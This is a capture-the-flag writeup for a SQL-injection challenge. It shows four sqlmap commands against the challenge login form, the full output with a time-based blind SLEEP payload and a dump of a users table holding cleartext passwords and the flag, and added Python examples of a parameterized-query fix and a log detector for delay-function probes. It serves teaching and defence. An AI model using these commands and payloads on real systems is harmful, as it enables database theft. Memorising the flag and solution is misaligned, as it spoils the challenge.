Writeup

According to the challenge hint this should be SQL injection. The challenge page contains only a single form, so sqlmap is used to inject into that form.

With the `--forms` option sqlmap discovers and tests the form automatically, and the flag is obtained step by step.

### Summary of the sqlmap options used

| Option | Purpose | Example |
|---|---|---|
| `-u` | Target URL. | |
| `-C` | Column name(s) to work on (comma-separated for several columns). | |
| `-D` | Database name. | |
| `-T` | Table name. | |
| `-r` | Load the request from a file, keeping all request details; the injection point is identified automatically. | |
| `--columns` | Enumerate the columns of the specified table. | |
| `--tables` | Enumerate the tables of the specified database. | |
| `--dump` | Dump data. | |
| `--dbs` | Enumerate all databases. | `sqlmap -u URL --dbs` |
| `--level` | Test depth (1-5). | `--level 3` (tests Cookie injection) |
| `--risk` | Risk level (1-3). | `--risk 3` (uses risky statements) |
| `--proxy` | Send traffic through a proxy. | `--proxy="http://127.0.0.1:8080"` |
| `--tamper` | Bypass WAF filtering with a tamper script. | `--tamper=space2comment` |
| `--forms` | Discover forms on the target page and test them automatically. | |
| `--batch` | No user interaction; the default answer is chosen for every prompt. | |
| `--current-db` | Retrieve the name of the current database. | |
| `--dump-all` | Dump all data. | `sqlmap -u URL --dump-all` |
| `--os-shell` | Obtain an operating system shell. | `sqlmap -u URL --os-shell` |

The four commands run, in order:

```bash
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump
```
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:18:50 /2025-07-01/

[05:18:50] [INFO] testing connection to the target URL
[05:18:50] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:18:51] [INFO] resuming back-end DBMS 'mysql' 
[05:18:51] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0518am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:18:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:18:51] [INFO] fetching current database
[05:18:51] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:18:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[05:19:10] [INFO] adjusting time delay to 1 second due to good response times
qsnctf
current database: 'qsnctf'
```
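The injection point sqlmap resumed above is a time-based blind one in the `uname` field of `login.php`, which tells a defender that the login handler splices the submitted username into the SQL text. The following Python script is an added example, not code from the writeup or from the challenge (whose `login.php` is not shown): it reconstructs the hypothetical vulnerable lookup beside a parameterized one and runs both against an in-memory SQLite table with the same three columns sqlmap later enumerates. SQLite stands in for MariaDB, the rows are constructed placeholders, and the payload is the one sqlmap printed.

```python
"""Added example (not part of the original writeup): why the challenge's login
form was injectable, and how a parameterized query closes the hole.

Assumptions: login.php is not on the page, so unsafe_query() is a hypothetical
reconstruction of the classic string-concatenated lookup; sqlite3 replaces the
MySQL/MariaDB backend so the script runs offline.
"""
import sqlite3

# Constructed sample rows with the schema sqlmap enumerated (id, username,
# password). Values are placeholders, not the challenge's data.
SAMPLE_USERS = [(1, "admin", "hunter2"), (2, "user", "flag{placeholder}")]

# The time-based blind payload sqlmap reported for the 'uname' parameter.
SQLMAP_PAYLOAD = "1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe"


def make_db():
    """In-memory stand-in for the qsnctf.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def unsafe_query(uname, psw):
    """Hypothetical vulnerable pattern: user input is spliced into the SQL text."""
    return ("SELECT id, username FROM users WHERE username = '" + uname
            + "' AND password = '" + psw + "'")


def unsafe_login(conn, uname, psw):
    """Execute the concatenated statement; the input can rewrite the WHERE clause."""
    return conn.execute(unsafe_query(uname, psw)).fetchone()


def safe_login(conn, uname, psw):
    """Parameterized form: values travel separately from the SQL text, so quotes
    and keywords in the input are never parsed as SQL."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (uname, psw),
    ).fetchone()


def injected_text_reaches_parser(conn, uname):
    """True when the SQL engine tried to execute the injected text. SQLite has
    no SLEEP(), so the spliced subquery fails with 'no such function: SLEEP',
    which proves the attacker's string became part of the statement. On
    MariaDB the same statement would simply pause for five seconds, which is
    the side channel a time-based blind injection measures."""
    try:
        unsafe_login(conn, uname, "x")
    except sqlite3.OperationalError as exc:
        return "SLEEP" in str(exc)
    return False


if __name__ == "__main__":
    db = make_db()
    print(unsafe_query(SQLMAP_PAYLOAD, "1"))
    print("injected text parsed as SQL:", injected_text_reaches_parser(db, SQLMAP_PAYLOAD))
    print("parameterized lookup with the payload:", safe_login(db, SQLMAP_PAYLOAD, "1"))
```

Printing `unsafe_query(SQLMAP_PAYLOAD, "1")` shows the mechanism: the injected `'` closes the username literal, the `SLEEP` subquery becomes part of the statement, and the trailing `AND 'yCGe'='yCGe` re-balances the quotes so the statement still parses. With placeholders the same string is just a username that matches nothing. The dump at the end of the writeup also shows passwords stored in clear text, so hashing them would have limited what an injection could expose even before the query was fixed.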
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables

[*] starting @ 05:27:27 /2025-07-01/

[05:27:27] [INFO] testing connection to the target URL
[05:27:27] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:27:28] [INFO] resuming back-end DBMS 'mysql' 
[05:27:28] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0527am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:27:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:27:28] [INFO] fetching tables for database: 'qsnctf'
[05:27:28] [INFO] fetching number of tables for database 'qsnctf'
[05:27:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:27:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:27:37] [INFO] retrieved: 
[05:27:47] [INFO] adjusting time delay to 1 second due to good response times
users
Database: qsnctf
[1 table]
+-------+
| users |
+-------+
```
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns

[*] starting @ 05:29:34 /2025-07-01/

[05:29:34] [INFO] testing connection to the target URL
[05:29:34] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:29:34] [INFO] resuming back-end DBMS 'mysql' 
[05:29:34] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0529am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:29:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:29:35] [INFO] fetching columns for table 'users' in database 'qsnctf'
[05:29:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:29:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:29:53] [INFO] adjusting time delay to 1 second due to good response times
3
[05:29:53] [INFO] retrieved: id
[05:30:01] [INFO] retrieved: int(11)
[05:30:32] [INFO] retrieved: username
[05:31:01] [INFO] retrieved: text
[05:31:20] [INFO] retrieved: password
[05:31:53] [INFO] retrieved: text
Database: qsnctf
Table: users
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
```
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump

[*] starting @ 05:33:55 /2025-07-01/

[05:33:55] [INFO] testing connection to the target URL
[05:33:55] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:33:56] [INFO] resuming back-end DBMS 'mysql' 
[05:33:56] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0533am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:33:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:33:56] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'qsnctf'
[05:33:56] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'qsnctf'
[05:33:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[05:34:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[05:34:18] [INFO] adjusting time delay to 1 second due to good response times
1
[05:34:20] [INFO] retrieved: 123456
[05:34:41] [INFO] retrieved: admin
[05:34:59] [INFO] retrieved: 2
[05:35:03] [INFO] retrieved: flag{ca74d097080346969f41c257318a7411}
[05:37:45] [INFO] retrieved: user
Database: qsnctf
Table: users
[2 entries]
+----+----------------------------------------+----------+
| id | password                               | username |
+----+----------------------------------------+----------+
| 1  | 123456                                 | admin    |
| 2  | flag{ca74d097080346969f41c257318a7411} | user     |
+----+----------------------------------------+----------+
```
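Each sqlmap run above issued many POSTs to `/login.php`, and the blind extraction phase is visible in the timestamps: responses alternate between a forced delay (first 5 seconds, then 1 second after "adjusting time delay") and a near-instant answer. The following Python script is an added example rather than part of the writeup: it models how a defender could flag that pattern from request logs. It assumes a hypothetical JSON-lines log that records the POST body and the response time (nginx's default access log records neither, so a reverse proxy, WAF or application log would have to supply them). All records are constructed; the first probe body is the URL-encoded form of the payload sqlmap printed above.

```python
"""Added example, not part of the original writeup: spotting the time-based blind
probing seen in the sqlmap transcript from request logs.

Assumptions (hypothetical): the log is JSON lines with the POST body and the
upstream response time in seconds ('rt'). All records are constructed.
"""
import json
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# SLEEP() is what sqlmap used against this MariaDB backend; BENCHMARK(),
# PG_SLEEP() and WAITFOR DELAY are the equivalent delay primitives on MySQL,
# PostgreSQL and SQL Server, added from general knowledge.
DELAY_FUNCS = re.compile(
    r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.IGNORECASE)

SLOW_SECONDS = 1.0     # a login should answer well under a second; tune per endpoint
BURST_THRESHOLD = 40   # one client sending this many requests to one path

# The payload sqlmap reported for 'uname', URL-encoded as it leaves the tool.
SQLMAP_BODY = ("uname=1%27%20AND%20%28SELECT%208158%20FROM%20%28SELECT%28SLEEP%285%29%29%29"
               "OZHS%29%20AND%20%27yCGe%27%3D%27yCGe&psw=1")


def _rec(ip, method, path, body, rt):
    return json.dumps({"ip": ip, "method": method, "path": path, "body": body, "rt": rt})


def build_sample_log():
    """Constructed traffic: three ordinary users and two probing clients."""
    lines = [
        _rec("10.0.0.5", "POST", "/login.php", "uname=alice&psw=correct-horse", 0.12),
        _rec("10.0.0.6", "GET", "/report.php", "", 6.3),   # slow, but a plain GET with no body
        _rec("10.0.0.7", "POST", "/login.php", "uname=bob&psw=pw", 0.09),
        # sqlmap's detection payload: a 5-second SLEEP, answered after ~5 s
        _rec("203.0.113.9", "POST", "/login.php", SQLMAP_BODY, 5.2),
    ]
    # Blind extraction phase: true/false branches alternate, and after the
    # "adjusting time delay to 1 second" step a true branch costs ~1 s.
    for i in range(60):
        body = f"uname=1%27%20AND%20{i}%3D{i}%20AND%20SLEEP%281%29%20AND%20%27a%27%3D%27a&psw=1"
        lines.append(_rec("203.0.113.9", "POST", "/login.php", body, 1.1 if i % 2 else 0.1))
    # A second client whose bodies carry no recognizable function name
    # (placeholder text), so only the behavioural rule can flag it.
    for i in range(50):
        body = "uname=1%27%20AND%20%28obfuscated-placeholder%29&psw=1"
        lines.append(_rec("198.51.100.4", "POST", "/login.php", body, 5.1 if i % 2 else 0.1))
    return "\n".join(lines)


def analyze(log_text):
    """Return {(ip, path): [reasons]} for clients that look like time-based probes."""
    stats = defaultdict(lambda: {"count": 0, "sig": 0, "slow": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        s = stats[(rec["ip"], rec["path"])]
        s["count"] += 1
        # Decode before matching: the tool sends %28SLEEP%285%29, not SLEEP(5)
        if DELAY_FUNCS.search(unquote_plus(rec.get("body", ""))):
            s["sig"] += 1
        if rec["method"] == "POST" and rec["rt"] >= SLOW_SECONDS:
            s["slow"] += 1
    findings = {}
    for key, s in stats.items():
        reasons = []
        if s["sig"]:
            reasons.append(f"delay function in {s['sig']} request bodies")
        if s["count"] >= BURST_THRESHOLD and s["slow"]:
            reasons.append(f"{s['count']} requests, {s['slow']} answered slowly (time-based pattern)")
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for (ip, path), reasons in analyze(build_sample_log()).items():
        print(ip, path, "->", "; ".join(reasons))
```

The signature rule is cheap and catches the stock payloads; the behavioural rule (one client, one endpoint, many requests, a bimodal response time) is what still fires when the body is obfuscated, for example by the tamper scripts listed in the option table, and it is also the rule that the single slow `/report.php` request does not trip.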
